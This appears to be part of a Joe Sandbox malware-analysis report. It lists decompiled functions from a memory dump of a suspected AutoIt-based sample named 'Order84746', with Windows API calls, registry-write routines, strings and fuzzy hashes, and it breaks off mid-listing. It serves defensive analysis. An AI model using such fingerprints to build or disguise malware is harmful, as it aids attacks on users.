                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DestroyMessageSendWindow$DeleteObject$B0200CursorInvalidateMoveRect
                          • String ID: 0
                          • API String ID: 3010530511-4108050209
                          • Opcode ID: 3115f3d0497804006ad0e35f096b8d92e6de40072a5bffa749fad042c1102c1f
                          • Instruction ID: cb378262d689c0e1da604c0679387b708fbee4166eaa8f56cd1530fa64991c87
                          • Opcode Fuzzy Hash: 3115f3d0497804006ad0e35f096b8d92e6de40072a5bffa749fad042c1102c1f
                          • Instruction Fuzzy Hash: A312C030606205DFDB20CF29C884BA9BBE4FF45306F144569FA99CB262D771EC4ADB91
                          Function 0094638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,0097DC00), ref: 00946449
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 3964851224-45149045
                          • Opcode ID: 3be2b8e4ad62e809370b1a44190c1006517fba4e7f3dd384e4f188092d881067
                          • Instruction ID: a81458f67b624be32f5176d0993270616945b44b9cab1efc0b2c5e891e26daf9
                          • Opcode Fuzzy Hash: 3be2b8e4ad62e809370b1a44190c1006517fba4e7f3dd384e4f188092d881067
                          • Instruction Fuzzy Hash: BEC141702043498BCB14EF18C551EAE77A6FF96344F044869F9859B3A2DB24ED4BCB53
                          Function 0094D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 0094D5AE
                          • SetTextColor.GDI32(?,?), ref: 0094D5B2
                          • GetSysColorBrush.USER32(0000000F), ref: 0094D5C8
                          • GetSysColor.USER32(0000000F), ref: 0094D5D3
                          • CreateSolidBrush.GDI32(?), ref: 0094D5D8
                          • GetSysColor.USER32(00000011), ref: 0094D5F0
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094D5FE
                          • SelectObject.GDI32(?,00000000), ref: 0094D60F
                          • SetBkColor.GDI32(?,00000000), ref: 0094D618
                          • SelectObject.GDI32(?,?), ref: 0094D625
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0094D644
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094D65B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0094D670
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0094D698
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0094D6BF
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0094D6DD
                          • DrawFocusRect.USER32(?,?), ref: 0094D6E8
                          • GetSysColor.USER32(00000011), ref: 0094D6F6
                          • SetTextColor.GDI32(?,00000000), ref: 0094D6FE
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0094D712
                          • SelectObject.GDI32(?,0094D2A5), ref: 0094D729
                          • DeleteObject.GDI32(?), ref: 0094D734
                          • SelectObject.GDI32(?,?), ref: 0094D73A
                          • DeleteObject.GDI32(?), ref: 0094D73F
                          • SetTextColor.GDI32(?,?), ref: 0094D745
                          • SetBkColor.GDI32(?,?), ref: 0094D74F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 509bd5b84ec97b1ba9dceb66fac6aa514e133fb0dba43111f894ff404983b0a2
                          • Instruction ID: 707d2f10ccb6aa589b43d52f4ef23aebb742c0896a513e9eb401d8a435af2f66
                          • Opcode Fuzzy Hash: 509bd5b84ec97b1ba9dceb66fac6aa514e133fb0dba43111f894ff404983b0a2
                          • Instruction Fuzzy Hash: 9D517E71E06208AFDF109FA8DC48EAE7B79FF09324F114115F925AB2A1D7B19A00DF90
                          Function 0094B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0094B7B0
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0094B7C1
                          • CharNextW.USER32(0000014E), ref: 0094B7F0
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0094B831
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0094B847
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0094B858
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0094B875
                          • SetWindowTextW.USER32(?,0000014E), ref: 0094B8C7
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0094B8DD
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0094B90E
                          • _memset.LIBCMT ref: 0094B933
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0094B97C
                          • _memset.LIBCMT ref: 0094B9DB
                          • SendMessageW.USER32 ref: 0094BA05
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0094BA5D
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0094BB0A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0094BB2C
                          • GetMenuItemInfoW.USER32(?), ref: 0094BB76
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0094BBA3
                          • DrawMenuBar.USER32(?), ref: 0094BBB2
                          • SetWindowTextW.USER32(?,0000014E), ref: 0094BBDA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: 4b905f3ba25db155238d5c703df1d4250f3663e06f4c7b701a9b537036c264a3
                          • Instruction ID: 49a42b690aa2208893c60c001337a7dcd417a092e80b56a76bd846081463d2b7
                          • Opcode Fuzzy Hash: 4b905f3ba25db155238d5c703df1d4250f3663e06f4c7b701a9b537036c264a3
                          • Instruction Fuzzy Hash: 88E17A75900218ABDB20DF65CC84EEE7BBCFF45714F14815AFA29AA290DB74CA41DF60
                          Function 0094764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 0094778A
                          • GetDesktopWindow.USER32 ref: 0094779F
                          • GetWindowRect.USER32(00000000), ref: 009477A6
                          • GetWindowLongW.USER32(?,000000F0), ref: 00947808
                          • DestroyWindow.USER32(?), ref: 00947834
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0094785D
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094787B
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009478A1
                          • SendMessageW.USER32(?,00000421,?,?), ref: 009478B6
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009478C9
                          • IsWindowVisible.USER32(?), ref: 009478E9
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00947904
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00947918
                          • GetWindowRect.USER32(?,?), ref: 00947930
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00947956
                          • GetMonitorInfoW.USER32 ref: 00947970
                          • CopyRect.USER32(?,?), ref: 00947987
                          • SendMessageW.USER32(?,00000412,00000000), ref: 009479F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: aa559594f2e18f86518905548c34200e510fbcf44596b4680c8e12a815e3f0f7
                          • Instruction ID: 358a7da820ff45cc4932e88886bc056da5a61306f9f404fbf2cb1980ab440676
                          • Opcode Fuzzy Hash: aa559594f2e18f86518905548c34200e510fbcf44596b4680c8e12a815e3f0f7
                          • Instruction Fuzzy Hash: A6B16C71618345AFDB04DFA9C988B6AFBE5FF89310F00891DF5999B291D770E804CB92
                          Function 008FA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008FA939
                          • GetSystemMetrics.USER32(00000007), ref: 008FA941
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008FA96C
                          • GetSystemMetrics.USER32(00000008), ref: 008FA974
                          • GetSystemMetrics.USER32(00000004), ref: 008FA999
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008FA9B6
                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 008FA9C6
                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008FA9F9
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008FAA0D
                          • GetClientRect.USER32(00000000,000000FF), ref: 008FAA2B
                          • GetStockObject.GDI32(00000011), ref: 008FAA47
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 008FAA52
                            • Part of subcall function 008FB63C: GetCursorPos.USER32(000000FF), ref: 008FB64F
                            • Part of subcall function 008FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 008FB66C
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000001), ref: 008FB691
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000002), ref: 008FB69F
                          • SetTimer.USER32(00000000,00000000,00000028,008FAB87), ref: 008FAA79
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: ebf138308d9c0b8993fdd6fce982735eef8bbdec4aa6796afd4954913d11b887
                          • Instruction ID: 0751d1c35a093b1900ace600da8a6f090bfdafe8f27ce07ac4202339ffcf7574
                          • Opcode Fuzzy Hash: ebf138308d9c0b8993fdd6fce982735eef8bbdec4aa6796afd4954913d11b887
                          • Instruction Fuzzy Hash: 36B1BE71A1520AAFDB14DFA8CC45BAE7BB4FF08325F154229FA19E7290DB70E840DB51
                          Function 008E2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Foreground
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 62970417-1919597938
                          • Opcode ID: b3cdc36576b68a685a7a9f3cd9b8e65ccfa814e3120528717ae88f7056dcf37c
                          • Instruction ID: 699ddd5613b9b2957a9588506f31b7f8c7e67f7280aa838915aa9bae10e190b7
                          • Opcode Fuzzy Hash: b3cdc36576b68a685a7a9f3cd9b8e65ccfa814e3120528717ae88f7056dcf37c
                          • Instruction Fuzzy Hash: DDD10C30508746ABCB14DF26C841AAABBF4FF56344F10492DF855971A1DB30E95ECBD2
                          Function 00943639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00943735
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097DC00,00000000,?,00000000,?,?), ref: 009437A3
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009437EB
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00943874
                          • RegCloseKey.ADVAPI32(?), ref: 00943B94
                          • RegCloseKey.ADVAPI32(00000000), ref: 00943BA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: fbb70261c3362699e58ce96323e10f3d857f3f2c813b29fae24ca7dfe66f9c1c
                          • Instruction ID: 0de9bc3650212189f9dbd579cb770bbf7ca01541a3edd2879f5e290e026a461a
                          • Opcode Fuzzy Hash: fbb70261c3362699e58ce96323e10f3d857f3f2c813b29fae24ca7dfe66f9c1c
                          • Instruction Fuzzy Hash: 54023B756046019FCB14EF29C855E2AB7E5FF89720F04855DF99A9B3A2CB70ED01CB82
                          Function 00946BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00946C56
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00946D16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: 01c7c9914b4645be5931b7ac551000b89e371489bd6009829d21d0afc8b5c4a3
                          • Instruction ID: c3f32886e0823f5808eb9be04ff63849c4f620051a7846c4be9a101d0f3ee493
                          • Opcode Fuzzy Hash: 01c7c9914b4645be5931b7ac551000b89e371489bd6009829d21d0afc8b5c4a3
                          • Instruction Fuzzy Hash: 15A16C742143459BCB14EF28C851E7AB3E5FF86314F104969B9A69B3D2DB30EC0ACB52
                          Function 0091CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 0091CF91
                          • __swprintf.LIBCMT ref: 0091D032
                          • _wcscmp.LIBCMT ref: 0091D045
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0091D09A
                          • _wcscmp.LIBCMT ref: 0091D0D6
                          • GetClassNameW.USER32(?,?,00000400), ref: 0091D10D
                          • GetDlgCtrlID.USER32(?), ref: 0091D15F
                          • GetWindowRect.USER32(?,?), ref: 0091D195
                          • GetParent.USER32(?), ref: 0091D1B3
                          • ScreenToClient.USER32(00000000), ref: 0091D1BA
                          • GetClassNameW.USER32(?,?,00000100), ref: 0091D234
                          • _wcscmp.LIBCMT ref: 0091D248
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0091D26E
                          • _wcscmp.LIBCMT ref: 0091D282
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                          • String ID: %s%u
                          • API String ID: 3119225716-679674701
                          • Opcode ID: 2a38cfb10f28d06422ae0ab304a4359051f75ff34b4d65637e5c472376c846b8
                          • Instruction ID: 866ed5d97e3447a14d524235592ee8f1e9a47433f55defb58794f3943d2b4d4e
                          • Opcode Fuzzy Hash: 2a38cfb10f28d06422ae0ab304a4359051f75ff34b4d65637e5c472376c846b8
                          • Instruction Fuzzy Hash: 5CA1AF7170920AAFD719DF64C884FEAB7ACFF44354F004919F9B992190DB30EA86CB91
                          Function 0091D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0091D8EB
                          • _wcscmp.LIBCMT ref: 0091D8FC
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0091D924
                          • CharUpperBuffW.USER32(?,00000000), ref: 0091D941
                          • _wcscmp.LIBCMT ref: 0091D95F
                          • _wcsstr.LIBCMT ref: 0091D970
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0091D9A8
                          • _wcscmp.LIBCMT ref: 0091D9B8
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0091D9DF
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0091DA28
                          • _wcscmp.LIBCMT ref: 0091DA38
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0091DA60
                          • GetWindowRect.USER32(00000004,?), ref: 0091DAC9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: 1cb23c7a69e5d0d08c2a04db58119c57ffe30bfaa9eec62b542f39bbc57491de
                          • Instruction ID: 1958e949295912e7963c576bd50af03a0c2a19224c1b423b5232830b690a3f5c
                          • Opcode Fuzzy Hash: 1cb23c7a69e5d0d08c2a04db58119c57ffe30bfaa9eec62b542f39bbc57491de
                          • Instruction Fuzzy Hash: E181A0312093499BDB05DF14C981BAA7BECFF84314F044469FD8A9A096DB70ED85CBA1
                          Function 0091D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: 7008aa05503e96800f6436616210ffea032918c2836039522d280d525f694b06
                          • Instruction ID: 4b92d65ff4db217ee6aaca00b43f1fc058fbd4fe132800273305c4870987a740
                          • Opcode Fuzzy Hash: 7008aa05503e96800f6436616210ffea032918c2836039522d280d525f694b06
                          • Instruction Fuzzy Hash: F6318F71A48249BADB14FB59DD43FEDB3B8AFA2758F200069F441B10D1FB51AB44C6A2
                          Function 0091EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000063), ref: 0091EAB0
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0091EAC2
                          • SetWindowTextW.USER32(?,?), ref: 0091EAD9
                          • GetDlgItem.USER32(?,000003EA), ref: 0091EAEE
                          • SetWindowTextW.USER32(00000000,?), ref: 0091EAF4
                          • GetDlgItem.USER32(?,000003E9), ref: 0091EB04
                          • SetWindowTextW.USER32(00000000,?), ref: 0091EB0A
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0091EB2B
